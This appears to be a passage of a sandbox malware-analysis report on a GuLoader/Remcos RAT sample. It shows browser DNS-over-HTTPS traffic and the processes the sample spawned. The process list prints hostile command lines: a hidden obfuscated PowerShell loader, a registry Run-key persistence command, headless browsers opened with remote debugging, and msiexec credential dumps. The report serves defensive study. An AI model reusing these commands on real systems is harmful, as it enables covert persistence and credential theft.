                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                        CF-RAY: 8e0c77a7f8f8b04e-ATL
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        2024-11-11 07:11:17 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 cf 00 04 ac fd 7c 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: wwwgstaticcom|^)


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        8192.168.11.2064413149.112.112.1124436672C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-11-11 07:11:17 UTC233OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                        Host: dns.quad9.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                        2024-11-11 07:11:17 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                        2024-11-11 07:11:17 UTC182INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 07:11:17 GMT
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 60
                                                                                                                                                                                                        Server: h2o/dnsdist
                                                                                                                                                                                                        content-type: application/dns-message
                                                                                                                                                                                                        cache-control: max-age=62
                                                                                                                                                                                                        2024-11-11 07:11:17 UTC60INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 3e 00 04 4a 7d 88 5e 00 00 29 04 d0 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: wwwgstaticcom>J}^)


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        9192.168.11.2057983172.64.41.34436672C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-11-11 07:11:17 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                        2024-11-11 07:11:17 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                        2024-11-11 07:11:17 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 07:11:17 GMT
                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                        CF-RAY: 8e0c77a7eb04676c-ATL
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        2024-11-11 07:11:17 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 b5 00 04 4a 7d 88 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: wwwgstaticcomJ}^)


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        10192.168.11.2055810149.112.112.1124436672C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-11-11 07:11:17 UTC233OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                        Host: dns.quad9.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                        2024-11-11 07:11:17 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                        2024-11-11 07:11:17 UTC183INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 07:11:17 GMT
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 60
                                                                                                                                                                                                        Server: h2o/dnsdist
                                                                                                                                                                                                        content-type: application/dns-message
                                                                                                                                                                                                        cache-control: max-age=161
                                                                                                                                                                                                        2024-11-11 07:11:17 UTC60INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 a1 00 04 8e fa 69 5e 00 00 29 04 d0 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: wwwgstaticcomi^)


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        11192.168.11.2060368172.64.41.34436672C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-11-11 07:11:17 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                        2024-11-11 07:11:17 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                        2024-11-11 07:11:17 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 07:11:17 GMT
                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                        CF-RAY: 8e0c77a7fa4cadc6-ATL
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        2024-11-11 07:11:17 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 eb 00 04 8e fa 69 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: wwwgstaticcomi^)


                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                        Start time:02:10:21
                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                        Path:C:\Users\user\Desktop\rPO3799039985.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\rPO3799039985.exe"
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:687'803 bytes
                                                                                                                                                                                                        MD5 hash:EFB9125831992267D27C5DD9A2BDC0BE
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                        Start time:02:10:23
                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum)
                                                                                                                                                                                                        Imagebase:0xd30000
                                                                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.144033904631.00000000094FE000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                        Start time:02:10:23
                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff6dd370000
                                                                                                                                                                                                        File size:875'008 bytes
                                                                                                                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                        Start time:02:10:43
                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                                                                                                        Imagebase:0x7a0000
                                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.144377552368.0000000005496000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.144377552368.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.144376861712.0000000005496000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.148899066974.0000000021140000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.148889275088.000000000327F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.148892015439.0000000005496000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.144376861712.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.148889312327.00000000045CE000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                        Start time:02:10:47
                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)"
                                                                                                                                                                                                        Imagebase:0x450000
                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                        Start time:02:10:47
                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff6dd370000
                                                                                                                                                                                                        File size:875'008 bytes
                                                                                                                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                        Start time:02:10:47
                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)"
                                                                                                                                                                                                        Imagebase:0x250000
                                                                                                                                                                                                        File size:59'392 bytes
                                                                                                                                                                                                        MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                        Start time:02:10:57
                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:--user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                                                                                                                                                                                                        Imagebase:0x7ff6c8090000
                                                                                                                                                                                                        File size:2'742'376 bytes
                                                                                                                                                                                                        MD5 hash:BB7C48CDDDE076E7EB44022520F40F77
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                        Start time:02:10:58
                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xocgcuufvngxpkogqqu"
                                                                                                                                                                                                        Imagebase:0x7a0000
                                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                        Start time:02:10:58
                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\hihycffzjvycrqdkhbgvqc"
                                                                                                                                                                                                        Imagebase:0x7a0000
                                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                        Start time:02:10:58
                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\rlmjdxqbxdqhcwrorltxbhbpx"
                                                                                                                                                                                                        Imagebase:0x7a0000
                                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                        Start time:02:10:59
                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=2204,i,2239432924243639277,16353558222963723582,262144 --variations-seed-version --mojo-platform-channel-handle=2220 /prefetch:3
                                                                                                                                                                                                        Imagebase:0x7ff6c8090000
                                                                                                                                                                                                        File size:2'742'376 bytes
                                                                                                                                                                                                        MD5 hash:BB7C48CDDDE076E7EB44022520F40F77
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                        Start time:02:11:10
                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:--user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                                                                                                                                                                                                        Imagebase:0x7ff7e42e0000
                                                                                                                                                                                                        File size:3'379'080 bytes
                                                                                                                                                                                                        MD5 hash:40AAE14A5C86EA857FA6E5FED689C48E
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                        Start time:02:11:10
                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,10008014947784373590,7267593141464040591,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 /prefetch:3
                                                                                                                                                                                                        Imagebase:0x7ff7e42e0000
                                                                                                                                                                                                        File size:3'379'080 bytes
                                                                                                                                                                                                        MD5 hash:40AAE14A5C86EA857FA6E5FED689C48E
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                        Start time:02:11:10
                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=Default --flag-switches-begin --flag-switches-end --do-not-de-elevate
                                                                                                                                                                                                        Imagebase:0x7ff7e42e0000
                                                                                                                                                                                                        File size:3'379'080 bytes
                                                                                                                                                                                                        MD5 hash:40AAE14A5C86EA857FA6E5FED689C48E
                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                                        Start time:02:11:11
                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,2106387817418742249,13274120828406319396,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2444 /prefetch:3
                                                                                                                                                                                                        Imagebase:0x7ff7e42e0000
                                                                                                                                                                                                        File size:3'379'080 bytes
                                                                                                                                                                                                        MD5 hash:40AAE14A5C86EA857FA6E5FED689C48E
                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                                        Start time:02:11:13
                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,2106387817418742249,13274120828406319396,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6276 /prefetch:8
                                                                                                                                                                                                        Imagebase:0x7ff7b5d70000
